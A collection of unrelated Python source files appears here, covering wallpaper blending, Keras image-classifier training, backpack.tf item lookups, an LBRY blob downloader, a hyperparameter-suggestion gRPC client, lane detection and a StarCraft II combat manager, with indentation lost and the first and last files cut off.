if day_image.size != night_image.size:
print "The two wallpapers must be the same size."
raise Exception("The two wallpapers must be the same size.")
try:
if not os.path.exists(appdata_folder):
os.mkdir(appdata_folder)
else:
cleanup_old_wallpapers()
blend_save_image(day_image, night_image, 0)
for step in range(1, step_count + 1):
opacity = step / float(step_count)
blend_save_image(day_image, night_image, opacity)
except:
print "Could not generate wallpapers."
raise
try:
output_file = open(os.path.join(appdata_folder, "images.json"), "w")
json.dump({"step_count": step_count,
"format": ".jpg"},
output_file)
output_file.close()
except IOError:
print "Could not write image settings."
raise
print "Images generated correctly."
def cleanup_old_wallpapers():
print "Cleaning up wallpaper directory."
for item in os.listdir(appdata_folder):
if item.endswith(".jpg"):
os.remove(os.path.join(appdata_folder, item))
def blend_save_image(day_image, night_image, opacity):
blended_image = Image.blend(day_image, night_image, opacity)
blended_image.save(os.path.join(appdata_folder, format(int(opacity * 255), "03d") + ".jpg"), quality=95)
blended_image.close()
def get_wallpaper_params():
print "Getting saved wallpaper params."
try:
file_obj = open(os.path.join(appdata_folder, "images.json"), "r")
result = json.load(file_obj)
file_obj.close()
return result
except IOError:
print "Could not read from wallpaper params file."
print "Try generating the wallpaper images with"
print "Nightshift.exe -g path_to_day_image path_to_night_image step_count"
raise
except:
print "Could not get saved location."
raise
|
nilq/baby-python
|
python
|
"""
adapted from keras example cifar10_cnn.py
Trains an AlexNet-based FCN on the material dataset (the original example trained ResNet-18 on CIFAR10).
GPU run command with Theano backend (with TensorFlow, the GPU is automatically used):
THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32 python cifar10.py
"""
from __future__ import print_function
import tensorflow as tf
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
sess = tf.Session(config=config)
from keras.preprocessing.image import ImageDataGenerator
from keras.utils import np_utils
from keras.callbacks import ReduceLROnPlateau, CSVLogger, EarlyStopping
import tensorflow as tf
import sys
import datetime
import os
import shutil
from keras.optimizers import Adam, Adadelta
from convnets import AlexNet_FCN
from datagenerator import data_gen
import keras.backend as K
import numpy as np
import dataloader
import datagenerator
from keras.backend.tensorflow_backend import set_session
from keras.metrics import top_k_categorical_accuracy
def top_3_accuracy(y_true, y_pred):
return top_k_categorical_accuracy(y_true, y_pred, k=3)
set_session(sess)
t = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
print(t)
batch_size = 32
nb_classes = 14
nb_epoch = 100
outs = 31
data_augmentation = True
# The data, shuffled and split between train and test sets:
dataset_fn = '../../../data_preprocessing/material_dataset.txt'
imgs_fn = '../../../../storage/center_227x227.npz'
weights_fn = '../../../../storage/alexnet_weights.h5'
#sz = 227
sz = 300
img_rows = sz
img_cols = sz
img_channels = 3
with tf.device('/gpu:0'):
lr_reducer = ReduceLROnPlateau(factor=np.sqrt(0.1), cooldown=0, patience=5, min_lr=0.5e-6)
early_stopper = EarlyStopping(min_delta=0.001, patience=10)
csv_logger = CSVLogger('alexnet.csv')
#model = resnet.ResnetBuilder.build_resnet_18((img_channels, img_rows, img_cols), nb_classes)
#model = resnet.ResnetBuilder.build_resnet_50((img_channels, img_rows, img_cols), nb_classes)
model, outs = AlexNet_FCN(nb_classes=nb_classes, sz=sz)
#model = AlexNet(weights_fn, nb_classes=nb_classes, sz=sz)
#model = AlexNet(weights_fn, nb_classes=nb_classes)
print("outs", outs)
#opt = Adadelta(lr=0.01, rho=0.95, epsilon=1e-08, decay=0.0)
#opt = Adadelta(lr=1, rho=0.95, epsilon=1e-08, decay=0.0)
def sum_loss(y_true, y_pred):
y_true = K.reshape(y_true, [batch_size*outs*outs, nb_classes])
y_pred = K.reshape(y_pred, [batch_size*outs*outs, nb_classes])
s = K.mean(K.categorical_crossentropy(y_true, y_pred))
return s
opt = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
model.compile(#loss='categorical_crossentropy',
loss=sum_loss,
optimizer=opt,
#metrics=['accuracy', top_3_accuracy])
metrics=['accuracy'])
if data_augmentation:
print('Using real-time data augmentation.')
# This will do preprocessing and realtime data augmentation:
r = 0.2
datagen = ImageDataGenerator(featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
rotation_range=r*100,
width_shift_range=r,
height_shift_range=r,
shear_range=r,
zoom_range=r,
channel_shift_range=r,
fill_mode='nearest',
cval=0.,
horizontal_flip=True,
vertical_flip=False,
rescale=None,
preprocessing_function=None)
# Compute quantities required for featurewise normalization
# (std, mean, and principal components if ZCA whitening is applied).
#datagen.fit(X_train)
def print_log(y_pred, Z, log_fn, k=5):
fout = open(log_fn, 'w')
acc1 = 0
acc3 = 0
cnt = 0
for i in range(0, len(y_pred), k):
img_fn = Z[i][0]
label = Z[i][1]
loc = Z[i][2]
print(img_fn, label, end=' ', file=fout)
y_sum = np.sum(y_pred[i:i+k], axis=0)
y_sum = np.sum(np.sum(y_sum, axis=0), axis=0)
y = [(j, y_sum[j]) for j in range(nb_classes)]
y_sorted = sorted(y, key=lambda d:d[1], reverse=True)
for j in y_sorted[:5]:
print(j[0], end=' ', file=fout)
print("", file=fout)
if y_sorted[0][0] == label:
acc1 += 1
if y_sorted[0][0] == label or y_sorted[1][0] == label or y_sorted[2][0] == label:
acc3 += 1
y_sum = np.zeros_like(y_pred[0])
cnt += 1
fout.close()
return acc1 * 1.0 / cnt, acc3 * 1.0 / cnt
def predict(model, val=True):
y_preds = []
Z = []
for (x, y, z) in datagenerator.test_generator(dataset_fn, imgs_fn, val=val, sz=img_rows):
y_pred = model.predict(x, batch_size=batch_size)
y_preds.append(y_pred)
Z = Z + z
y_preds = np.vstack(y_preds)
return y_preds, Z
log_dir = '../../../../result/alexnet/{}/'.format(t)
os.mkdir(log_dir)
shutil.copy('./fabric_train.py', log_dir+'fabric_train.py')
shutil.copy('./convnets.py', log_dir+'convnets.py')
G = data_gen('../../../data_preprocessing/material_dataset.txt', batch_size=batch_size, datagen=datagen, sz=sz, outs=outs)
# Fit the model on the batches generated by datagen.flow().
for epochs in range(nb_epoch):
model.fit_generator(#datagen.flow(X_train, Y_train, batch_size=batch_size),
#steps_per_epoch=X_train.shape[0] // batch_size,
G,
steps_per_epoch=500,
epochs=1, verbose=1, max_q_size=100)
#y_pred_valid = model.predict(X_valid, batch_size=batch_size)
#y_pred_test = model.predict(X_test, batch_size=batch_size)
y_pred_valid, Z_valid = predict(model, val=True)
y_pred_test, Z_test = predict(model, val=False)
k = 1
log_fn = log_dir + '.tmp.txt'
val_acc = print_log(y_pred_valid, Z_valid, log_fn, k=k)
test_acc = print_log(y_pred_test, Z_test, log_fn, k=k)
log_fn = log_dir + 'val_{:02d}'.format(epochs) + '_{:.4f}_{:.4f}'.format(val_acc[1], test_acc[1]) + '.txt'
print_log(y_pred_valid, Z_valid, log_fn, k=k)
log_fn = log_dir + '{:02d}'.format(epochs) + '_{:.4f}_{:.4f}'.format(val_acc[1], test_acc[1]) + '.txt'
print_log(y_pred_test, Z_test, log_fn, k=k)
print(epochs, val_acc, test_acc)
|
nilq/baby-python
|
python
|
class MiscUtils:
def __init__(self):
import requests
import json
r = requests.get("https://backpack.tf/filters")
obj = json.loads(r.text)
particles = obj['particle']
qualities = obj['quality']
rarities = obj['rarity']
paints = obj['paint']
origins = obj['origin']
wear_tiers = obj['wear_tiers']
killstreakers = obj['killstreakers']
sheens = obj['sheens']
killstreak_tiers = obj['killstreak_tiers']
strange_parts = obj['strange_parts']
self.particleObj = {}
self.qualitiesObj = {}
self.raritiesObj = {}
self.paintsObj = {}
self.originsObj = {}
self.wear_tiersObj = {}
self.killstreakers = {}
self.sheensObj = {}
self.killstreak_tiers = {}
self.strange_partsObj = {}
for particle in particles:
self.particleObj[particle['name'].lower()] = int(particle['id'])
for quality in qualities:
self.qualitiesObj[quality['name'].lower()] = int(quality['id'])
for rarity in rarities:
self.raritiesObj[rarity['name'].lower()] = int(rarity['id'])
for paint in paints:
self.paintsObj[paint['name'].lower()] = int(paint['id'])
for particle in origins:
self.originsObj[particle['name'].lower()] = int(particle['id'])
for particle in wear_tiers:
self.wear_tiersObj[wear_tiers[particle]['name'].lower()] = int(wear_tiers[particle]['id'])
for particle in killstreakers:
self.killstreakers[particle['name'].lower()] = int(particle['id'])
for particle in sheens:
self.sheensObj[particle['name'].lower()] = int(particle['id'])
for particle in killstreak_tiers:
self.killstreak_tiers[particle['name'].lower()] = int(particle['id'])
for particle in strange_parts:
self.strange_partsObj[particle['name'].lower()] = int(particle['id'])
#
# Converts quality string to quality int
#
def quality_String_To_Int(self, string):
try:
return self.qualitiesObj[string.lower()]
except:
return ""
#
# Converts particle string to particle int
#
def particle_String_To_Int(self, string):
try:
return self.particleObj[string.lower()]
except:
return ""
#
# Converts rarity string to rarity int
#
def rarity_String_To_Int(self, string):
try:
return self.raritiesObj[string.lower()]
except:
return ""
#
# Origin quality string to origin int
#
def origin_String_To_Int(self, string):
try:
return self.originsObj[string.lower()]
except:
return ""
#
# Converts wear_tier string to wear_tier int
#
def wear_tier_String_To_Int(self, string):
try:
return self.wear_tiersObj[string.lower()]
except:
return ""
#
# Converts killstreaker string to killstreaker int
#
def killstreaker_String_To_Int(self, string):
try:
return self.killstreakers[string.lower()]
except:
return ""
#
# Converts sheen string to sheen int
#
def sheen_String_To_Int(self, string):
try:
return self.sheensObj[string.lower()]
except:
return ""
#
# Converts killstreak_tier string to killstreak_tier int
#
def killstreak_tier_String_To_Int(self, string):
try:
return self.killstreak_tiers[string.lower()]
except:
return ""
#
# Converts strange_part string to strange_part int
#
def strange_parts_String_To_Int(self, string):
try:
return self.strange_partsObj[string.lower()]
except:
return ""
#
# Converts paint string to paint int
#
def paint_String_To_Int(self, string):
try:
return self.paintsObj[string.lower()]
except:
return ""
#
    # Converts a Steam ID into an account ID; the account ID is used in trading requests
#
def steam_id_to_account_id(self, steam_id):
import struct
return str(struct.unpack('>L', int(steam_id).to_bytes(8, byteorder='big')[4:])[0])
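# Standalone sketch of the SteamID64 -> account ID conversion used above: the account ID is
# simply the low 32 bits of the 64-bit Steam ID. The example ID below is made up.
if __name__ == "__main__":
    import struct
    steam_id = 76561198012345678
    account_id = struct.unpack('>L', steam_id.to_bytes(8, byteorder='big')[4:])[0]
    print(account_id)                 # 52079950
    print(steam_id & 0xFFFFFFFF)      # same value, expressed as a plain bit mask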
|
nilq/baby-python
|
python
|
import asyncio
import typing
import logging
from lbrynet.utils import drain_tasks
from lbrynet.blob_exchange.client import request_blob
if typing.TYPE_CHECKING:
from lbrynet.conf import Config
from lbrynet.dht.node import Node
from lbrynet.dht.peer import KademliaPeer
from lbrynet.blob.blob_manager import BlobFileManager
from lbrynet.blob.blob_file import BlobFile
log = logging.getLogger(__name__)
class BlobDownloader:
BAN_TIME = 10.0 # fixme: when connection manager gets implemented, move it out from here
def __init__(self, loop: asyncio.BaseEventLoop, config: 'Config', blob_manager: 'BlobFileManager',
peer_queue: asyncio.Queue):
self.loop = loop
self.config = config
self.blob_manager = blob_manager
self.peer_queue = peer_queue
self.active_connections: typing.Dict['KademliaPeer', asyncio.Task] = {} # active request_blob calls
self.ignored: typing.Dict['KademliaPeer', int] = {}
self.scores: typing.Dict['KademliaPeer', int] = {}
self.connections: typing.Dict['KademliaPeer', asyncio.Transport] = {}
self.time_since_last_blob = loop.time()
def should_race_continue(self, blob: 'BlobFile'):
if len(self.active_connections) >= self.config.max_connections_per_download:
return False
# if a peer won 3 or more blob races and is active as a downloader, stop the race so bandwidth improves
        # the safety net is that any failure resets the peer's score, which triggers the race again
        # TODO: this is a good idea for low bandwidth, but doesn't play nice on high bandwidth
# for peer, task in self.active_connections.items():
# if self.scores.get(peer, 0) >= 0 and self.rounds_won.get(peer, 0) >= 3 and not task.done():
# return False
return not (blob.get_is_verified() or blob.file_exists)
async def request_blob_from_peer(self, blob: 'BlobFile', peer: 'KademliaPeer'):
if blob.get_is_verified():
return
self.scores[peer] = self.scores.get(peer, 0) - 1 # starts losing score, to account for cancelled ones
transport = self.connections.get(peer)
start = self.loop.time()
bytes_received, transport = await request_blob(
self.loop, blob, peer.address, peer.tcp_port, self.config.peer_connect_timeout,
self.config.blob_download_timeout, connected_transport=transport
)
if bytes_received == blob.get_length():
self.time_since_last_blob = self.loop.time()
if not transport and peer not in self.ignored:
self.ignored[peer] = self.loop.time()
log.debug("drop peer %s:%i", peer.address, peer.tcp_port)
if peer in self.connections:
del self.connections[peer]
elif transport:
log.debug("keep peer %s:%i", peer.address, peer.tcp_port)
self.connections[peer] = transport
rough_speed = (bytes_received / (self.loop.time() - start)) if bytes_received else 0
self.scores[peer] = rough_speed
async def new_peer_or_finished(self, blob: 'BlobFile'):
async def get_and_re_add_peers():
try:
new_peers = await asyncio.wait_for(self.peer_queue.get(), timeout=1.0)
self.peer_queue.put_nowait(new_peers)
except asyncio.TimeoutError:
pass
tasks = [self.loop.create_task(get_and_re_add_peers()), self.loop.create_task(blob.verified.wait())]
active_tasks = list(self.active_connections.values())
try:
await asyncio.wait(tasks + active_tasks, loop=self.loop, return_when='FIRST_COMPLETED')
finally:
drain_tasks(tasks)
def cleanup_active(self):
to_remove = [peer for (peer, task) in self.active_connections.items() if task.done()]
for peer in to_remove:
del self.active_connections[peer]
def clearbanned(self):
now = self.loop.time()
if now - self.time_since_last_blob > 60.0:
return
forgiven = [banned_peer for banned_peer, when in self.ignored.items() if now - when > self.BAN_TIME]
self.peer_queue.put_nowait(forgiven)
for banned_peer in forgiven:
self.ignored.pop(banned_peer)
async def download_blob(self, blob_hash: str, length: typing.Optional[int] = None) -> 'BlobFile':
blob = self.blob_manager.get_blob(blob_hash, length)
if blob.get_is_verified():
return blob
try:
while not blob.get_is_verified():
batch: typing.List['KademliaPeer'] = []
while not self.peer_queue.empty():
batch.extend(self.peer_queue.get_nowait())
batch.sort(key=lambda peer: self.scores.get(peer, 0), reverse=True)
log.debug(
"running, %d peers, %d ignored, %d active",
len(batch), len(self.ignored), len(self.active_connections)
)
for peer in batch:
if not self.should_race_continue(blob):
break
if peer not in self.active_connections and peer not in self.ignored:
log.debug("request %s from %s:%i", blob_hash[:8], peer.address, peer.tcp_port)
t = self.loop.create_task(self.request_blob_from_peer(blob, peer))
self.active_connections[peer] = t
await self.new_peer_or_finished(blob)
self.cleanup_active()
if batch:
self.peer_queue.put_nowait(set(batch).difference(self.ignored))
else:
self.clearbanned()
blob.close()
log.debug("downloaded %s", blob_hash[:8])
return blob
finally:
while self.active_connections:
self.active_connections.popitem()[1].cancel()
def close(self):
self.scores.clear()
self.ignored.clear()
for transport in self.connections.values():
transport.close()
async def download_blob(loop, config: 'Config', blob_manager: 'BlobFileManager', node: 'Node',
blob_hash: str) -> 'BlobFile':
search_queue = asyncio.Queue(loop=loop, maxsize=config.max_connections_per_download)
search_queue.put_nowait(blob_hash)
peer_queue, accumulate_task = node.accumulate_peers(search_queue)
downloader = BlobDownloader(loop, config, blob_manager, peer_queue)
try:
return await downloader.download_blob(blob_hash)
finally:
if accumulate_task and not accumulate_task.done():
accumulate_task.cancel()
downloader.close()
|
nilq/baby-python
|
python
|
import grpc
from pkg.api.python import api_pb2
from pkg.api.python import api_pb2_grpc
from pkg.suggestion.test_func import func
from pkg.suggestion.types import DEFAULT_PORT
def run():
channel = grpc.insecure_channel(DEFAULT_PORT)
stub = api_pb2_grpc.SuggestionStub(channel)
set_param_response = stub.SetSuggestionParameters(api_pb2.SetSuggestionParametersRequest(
study_id="1",
suggestion_parameters=[
api_pb2.SuggestionParameter(
name="N",
value="100",
),
api_pb2.SuggestionParameter(
name="kernel_type",
value="matern",
),
api_pb2.SuggestionParameter(
name="mode",
value="ei",
),
api_pb2.SuggestionParameter(
name="trade_off",
value="0.01",
),
api_pb2.SuggestionParameter(
name="model_type",
value="gp",
),
api_pb2.SuggestionParameter(
name="n_estimators",
value="50",
),
]
))
completed_trials = []
maximum = -1
iter = 0
for i in range(30):
response = stub.GenerateTrials(api_pb2.GenerateTrialsRequest(
study_id="1",
configs=api_pb2.StudyConfig(
name="test_study",
owner="me",
optimization_type=api_pb2.MAXIMIZE,
optimization_goal=0.2,
parameter_configs=api_pb2.StudyConfig.ParameterConfigs(
configs=[
# api_pb2.ParameterConfig(
# name="param1",
# parameter_type=api_pb2.INT,
# feasible=api_pb2.FeasibleSpace(max="5", min="1", list=[]),
# ),
# api_pb2.ParameterConfig(
# name="param2",
# parameter_type=api_pb2.CATEGORICAL,
# feasible=api_pb2.FeasibleSpace(max=None, min=None, list=["cat1", "cat2", "cat3"])
# ),
# api_pb2.ParameterConfig(
# name="param3",
# parameter_type=api_pb2.DISCRETE,
# feasible=api_pb2.FeasibleSpace(max=None, min=None, list=["3", "2", "6"])
# ),
# api_pb2.ParameterConfig(
# name="param4",
# parameter_type=api_pb2.DOUBLE,
# feasible=api_pb2.FeasibleSpace(max="5", min="1", list=[])
# )
api_pb2.ParameterConfig(
name="param1",
parameter_type=api_pb2.DOUBLE,
feasible=api_pb2.FeasibleSpace(max="1", min="0", list=[]),
),
api_pb2.ParameterConfig(
name="param2",
parameter_type=api_pb2.DOUBLE,
feasible=api_pb2.FeasibleSpace(max="1", min="0", list=[])
),
],
),
access_permissions=[],
suggest_algorithm="BO",
autostop_algorithm="",
study_task_name="task",
suggestion_parameters=[],
tags=[],
objective_value_name="precision",
metrics=[],
image="",
command=["", ""],
gpu=0,
scheduler="",
mount=api_pb2.MountConf(
pvc="",
path="",
),
pull_secret=""
),
completed_trials=completed_trials,
running_trials=[],)
)
x1 = response.trials[0].parameter_set[0].value
x2 = response.trials[0].parameter_set[1].value
objective_value = func(float(x1), float(x2))
if objective_value > maximum:
maximum = objective_value
iter = i
print(objective_value)
completed_trials.append(api_pb2.Trial(
trial_id=response.trials[0].trial_id,
study_id="1",
status=api_pb2.COMPLETED,
eval_logs=[],
objective_value=str(objective_value),
parameter_set=[
api_pb2.Parameter(
name="param1",
parameter_type=api_pb2.DOUBLE,
value=x1,
),
api_pb2.Parameter(
name="param2",
parameter_type=api_pb2.DOUBLE,
value=x2,
),
]
))
print(str(response.trials[0].parameter_set))
stop_study_response = stub.StopSuggestion(api_pb2.StopStudyRequest(
study_id="1"
))
print("found the maximum: {} at {} iteration".format(maximum, iter))
if __name__ == "__main__":
run()
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
# @Time: 2020/10/10 11:58
# @Author: GraceKoo
# @File: interview_63.py
# @Desc: https://leetcode-cn.com/problems/shu-ju-liu-zhong-de-zhong-wei-shu-lcof/
from heapq import *
class MedianFinder:
def __init__(self):
"""
initialize your data structure here.
"""
        self.A = []  # max-heap (stored with negated values): holds the smaller half of the stream
        self.B = []  # min-heap: holds the larger half, so B's smallest element is >= A's largest, keeping the stream ordered
def addNum(self, num: int) -> None:
        # When the stream length is odd, insert into A: push num into B first, then move B's top element into A, keeping B >= A
if len(self.A) != len(self.B):
heappush(self.B, num)
heappush(self.A, -heappop(self.B))
        # When the stream length is even, insert into B: push num into A first, then move A's top element into B, keeping B >= A
else:
heappush(self.A, -num)
heappush(self.B, -heappop(self.A))
def findMedian(self) -> float:
if len(self.A) != len(self.B):
return self.B[0]
else:
return (-self.A[0] + self.B[0]) / 2.0
# Your MedianFinder object will be instantiated and called as such:
# obj = MedianFinder()
# obj.addNum(num)
# param_2 = obj.findMedian()
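# A small self-check sketch for the two-heap median finder above (the values are arbitrary):
if __name__ == "__main__":
    mf = MedianFinder()
    for n in (5, 2, 8, 1):
        mf.addNum(n)
    # the sorted stream is now [1, 2, 5, 8], so the median is (2 + 5) / 2
    assert mf.findMedian() == 3.5
    mf.addNum(10)  # stream becomes [1, 2, 5, 8, 10]; the median is 5
    assert mf.findMedian() == 5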
|
nilq/baby-python
|
python
|
import pytest
from pytest_cases.case_parametrizer_legacy import get_pytest_marks_on_function, make_marked_parameter_value
def test_get_pytest_marks():
"""
Tests that we are able to correctly retrieve the marks on case_func
:return:
"""
skip_mark = pytest.mark.skipif(True, reason="why")
@skip_mark
def case_func():
pass
# extract the marks from a case function
marks = get_pytest_marks_on_function(case_func, as_decorators=True)
# check that the mark is the same than a manually made one
assert len(marks) == 1
assert str(marks[0]) == str(skip_mark)
# transform a parameter into a marked parameter
dummy_case = (1, 2, 3)
marked_param = make_marked_parameter_value((dummy_case,), marks=marks)
|
nilq/baby-python
|
python
|
from Game import game
class MyClass(object):
gamenew = game()
def executegame(self):
self.gamenew.gamce()
print 'test'
if __name__ == '__main__':
a = MyClass()
a.executegame()
|
nilq/baby-python
|
python
|
import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import pickle
from combined_thresh import combined_thresh
from perspective_transform import perspective_transform
from Line import Line
from line_fit import line_fit, tune_fit, final_viz, calc_curve, calc_vehicle_offset, viz2
from moviepy.editor import VideoFileClip
# Global variables (just to make the moviepy video annotation work)
with open('calibrate_camera.p', 'rb') as f:
save_dict = pickle.load(f)
mtx = save_dict['mtx']
dist = save_dict['dist']
window_size = 5 # how many frames for line smoothing
left_line = Line(n=window_size)
right_line = Line(n=window_size)
detected = False # did the fast line fit detect the lines?
left_curve, right_curve = 0., 0. # radius of curvature for left and right lanes
left_lane_inds, right_lane_inds = None, None # for calculating curvature
frameCount = 0
retLast = {}
# MoviePy video annotation will call this function
def annotate_image(img_in):
"""
Annotate the input image with lane line markings
Returns annotated image
"""
global mtx, dist, left_line, right_line, detected, frameCount, retLast
global left_curve, right_curve, left_lane_inds, right_lane_inds
frameCount += 1
src = np.float32(
[[200, 720],
[1100, 720],
[520, 500],
[760, 500]])
x = [src[0, 0], src[1, 0], src[3, 0], src[2, 0], src[0, 0]]
y = [src[0, 1], src[1, 1], src[3, 1], src[2, 1], src[0, 1]]
# Undistort, threshold, perspective transform
undist = cv2.undistort(img_in, mtx, dist, None, mtx)
img, abs_bin, mag_bin, dir_bin, hls_bin = combined_thresh(undist)
binary_warped, binary_unwarped, m, m_inv = perspective_transform(img)
# Perform polynomial fit
if not detected:
# Slow line fit
ret = line_fit(binary_warped)
        # if no lanes were detected, fall back to the last result
if len(ret) == 0:
ret = retLast
left_fit = ret['left_fit']
right_fit = ret['right_fit']
nonzerox = ret['nonzerox']
nonzeroy = ret['nonzeroy']
out_img = ret['out_img']
left_lane_inds = ret['left_lane_inds']
right_lane_inds = ret['right_lane_inds']
histogram = ret['histo']
# Get moving average of line fit coefficients
left_fit = left_line.add_fit(left_fit)
right_fit = right_line.add_fit(right_fit)
# Calculate curvature
left_curve, right_curve = calc_curve(left_lane_inds, right_lane_inds, nonzerox, nonzeroy)
detected = True # slow line fit always detects the line
else: # implies detected == True
# Fast line fit
left_fit = left_line.get_fit()
right_fit = right_line.get_fit()
ret = tune_fit(binary_warped, left_fit, right_fit)
left_fit = ret['left_fit']
right_fit = ret['right_fit']
nonzerox = ret['nonzerox']
nonzeroy = ret['nonzeroy']
left_lane_inds = ret['left_lane_inds']
right_lane_inds = ret['right_lane_inds']
# Only make updates if we detected lines in current frame
if ret is not None:
left_fit = ret['left_fit']
right_fit = ret['right_fit']
nonzerox = ret['nonzerox']
nonzeroy = ret['nonzeroy']
left_lane_inds = ret['left_lane_inds']
right_lane_inds = ret['right_lane_inds']
left_fit = left_line.add_fit(left_fit)
right_fit = right_line.add_fit(right_fit)
left_curve, right_curve = calc_curve(left_lane_inds, right_lane_inds, nonzerox, nonzeroy)
else:
detected = False
vehicle_offset = calc_vehicle_offset(undist, left_fit, right_fit)
# Perform final visualization on top of original undistorted image
result = final_viz(undist, left_fit, right_fit, m_inv, left_curve, right_curve, vehicle_offset)
retLast = ret
save_viz2 = './output_images/polyfit_test%d.jpg' % (frameCount)
viz2(binary_warped, ret, save_viz2)
save_warped = './output_images/warped_test%d.jpg' % (frameCount)
plt.imshow(binary_warped, cmap='gray', vmin=0, vmax=1)
if save_warped is None:
plt.show()
else:
plt.savefig(save_warped)
plt.gcf().clear()
save_binary = './output_images/binary_test%d.jpg' % (frameCount)
plt.imshow(img, cmap='gray', vmin=0, vmax=1)
if save_binary is None:
plt.show()
else:
plt.savefig(save_binary)
plt.gcf().clear()
if frameCount > 0:
fig = plt.gcf()
fig.set_size_inches(16.5, 8.5)
plt.subplot(2, 3, 1)
plt.imshow(undist)
# plt.plot(undist)
plt.plot(x, y)
plt.title('undist')
plt.subplot(2, 3, 2)
plt.imshow(hls_bin, cmap='gray', vmin=0, vmax=1)
plt.title('hls_bin')
plt.subplot(2, 3, 3)
plt.imshow(abs_bin, cmap='gray', vmin=0, vmax=1)
plt.title('abs_bin')
plt.subplot(2, 3, 4)
plt.imshow(img, cmap='gray', vmin=0, vmax=1)
plt.title('img')
plt.subplot(2, 3, 5)
plt.imshow(out_img)
plt.title('out_img')
plt.subplot(2, 3, 6)
plt.imshow(result, cmap='gray', vmin=0, vmax=1)
plt.title('result')
save_result = 'D:/code/github_code/CarND-Advanced-Lane-Lines-P4/output_images/result-test%d.jpg' % (frameCount)
if save_result is None:
plt.show()
else:
plt.savefig(save_result)
plt.gcf().clear()
return result
def annotate_video(input_file, output_file):
""" Given input_file video, save annotated video to output_file """
video = VideoFileClip(input_file)
annotated_video = video.fl_image(annotate_image)
annotated_video.write_videofile(output_file, audio=False)
if __name__ == '__main__':
# Annotate the video
# annotate_video('challenge_video.mp4', 'challenge_video_out.mp4')
# Show example annotated image on screen for sanity check
for i in range (1, 7):
img_file = 'test_images/test%d.jpg' % (i)
img = mpimg.imread(img_file)
result = annotate_image(img)
plt.imshow(result)
save_file = 'D:/code/github_code/CarND-Advanced-Lane-Lines-P4/output_images/test%d.jpg' % (i)
if save_file is None:
plt.show()
else:
plt.savefig(save_file)
plt.gcf().clear()
|
nilq/baby-python
|
python
|
from typing import List, Dict, Optional, Union
from sharpy.combat import *
from sharpy.general.extended_power import ExtendedPower
from sharpy.interfaces import ICombatManager
from sharpy.managers.core import UnitCacheManager, PathingManager, ManagerBase
from sharpy.combat import Action
from sc2.units import Units
from sc2 import UnitTypeId
from sc2.position import Point2, Point3
from sc2.unit import Unit
import numpy as np
from sklearn.cluster import DBSCAN
ignored = {UnitTypeId.MULE, UnitTypeId.LARVA, UnitTypeId.EGG}
class GroupCombatManager(ManagerBase, ICombatManager):
rules: MicroRules
def __init__(self):
super().__init__()
self.default_rules = MicroRules()
self.default_rules.load_default_methods()
self.default_rules.load_default_micro()
self.enemy_group_distance = 7
async def start(self, knowledge: "Knowledge"):
await super().start(knowledge)
self.cache: UnitCacheManager = self.knowledge.unit_cache
self.pather: PathingManager = self.knowledge.pathing_manager
self._tags: List[int] = []
self.all_enemy_power = ExtendedPower(self.unit_values)
await self.default_rules.start(knowledge)
@property
def tags(self) -> List[int]:
return self._tags
@property
def regroup_threshold(self) -> float:
""" Percentage 0 - 1 on how many of the attacking units should actually be together when attacking"""
return self.rules.regroup_percentage
@property
def own_group_threshold(self) -> float:
"""
How much distance must be between units to consider them to be in different groups
"""
return self.rules.own_group_distance
@property
def unit_micros(self) -> Dict[UnitTypeId, MicroStep]:
return self.rules.unit_micros
@property
def generic_micro(self) -> MicroStep:
return self.rules.generic_micro
async def update(self):
self.enemy_groups: List[CombatUnits] = self.group_enemy_units()
self.all_enemy_power.clear()
for group in self.enemy_groups: # type: CombatUnits
self.all_enemy_power.add_units(group.units)
async def post_update(self):
pass
@property
def debug(self):
return self._debug and self.knowledge.debug
def add_unit(self, unit: Unit):
if unit.type_id in ignored: # Just no
return
self._tags.append(unit.tag)
def add_units(self, units: Units):
for unit in units:
self.add_unit(unit)
def get_all_units(self) -> Units:
units = Units([], self.ai)
for tag in self._tags:
unit = self.cache.by_tag(tag)
if unit:
units.append(unit)
return units
def execute(self, target: Point2, move_type=MoveType.Assault, rules: Optional[MicroRules] = None):
our_units = self.get_all_units()
if len(our_units) < 1:
return
self.rules = rules if rules else self.default_rules
self.own_groups: List[CombatUnits] = self.group_own_units(our_units)
if self.debug:
fn = lambda group: group.center.distance_to(self.ai.start_location)
sorted_list = sorted(self.own_groups, key=fn)
for i in range(0, len(sorted_list)):
sorted_list[i].debug_index = i
self.rules.handle_groups_func(self, target, move_type)
self._tags.clear()
def faster_group_should_regroup(self, group1: CombatUnits, group2: Optional[CombatUnits]) -> bool:
if not group2:
return False
if group1.average_speed < group2.average_speed + 0.1:
return False
# Our group is faster, it's a good idea to regroup
return True
def regroup(self, group: CombatUnits, target: Union[Unit, Point2]):
if isinstance(target, Unit):
target = self.pather.find_path(group.center, target.position, 1)
else:
target = self.pather.find_path(group.center, target, 3)
self.move_to(group, target, MoveType.Push)
def move_to(self, group: CombatUnits, target, move_type: MoveType):
self.action_to(group, target, move_type, False)
def attack_to(self, group: CombatUnits, target, move_type: MoveType):
self.action_to(group, target, move_type, True)
def action_to(self, group: CombatUnits, target, move_type: MoveType, is_attack: bool):
original_target = target
if isinstance(target, Point2) and group.ground_units:
if move_type in {MoveType.DefensiveRetreat, MoveType.PanicRetreat}:
target = self.pather.find_influence_ground_path(group.center, target, 14)
else:
target = self.pather.find_path(group.center, target, 14)
own_unit_cache: Dict[UnitTypeId, Units] = {}
for unit in group.units:
real_type = self.unit_values.real_type(unit.type_id)
units = own_unit_cache.get(real_type, Units([], self.ai))
if units.amount == 0:
own_unit_cache[real_type] = units
units.append(unit)
for type_id, type_units in own_unit_cache.items():
micro: MicroStep = self.unit_micros.get(type_id, self.generic_micro)
micro.init_group(self.rules, group, type_units, self.enemy_groups, move_type, original_target)
group_action = micro.group_solve_combat(type_units, Action(target, is_attack))
for unit in type_units:
final_action = micro.unit_solve_combat(unit, group_action)
final_action.to_commmand(unit)
if self.debug:
if final_action.debug_comment:
status = final_action.debug_comment
elif final_action.ability:
status = final_action.ability.name
elif final_action.is_attack:
status = "Attack"
else:
status = "Move"
if final_action.target is not None:
if isinstance(final_action.target, Unit):
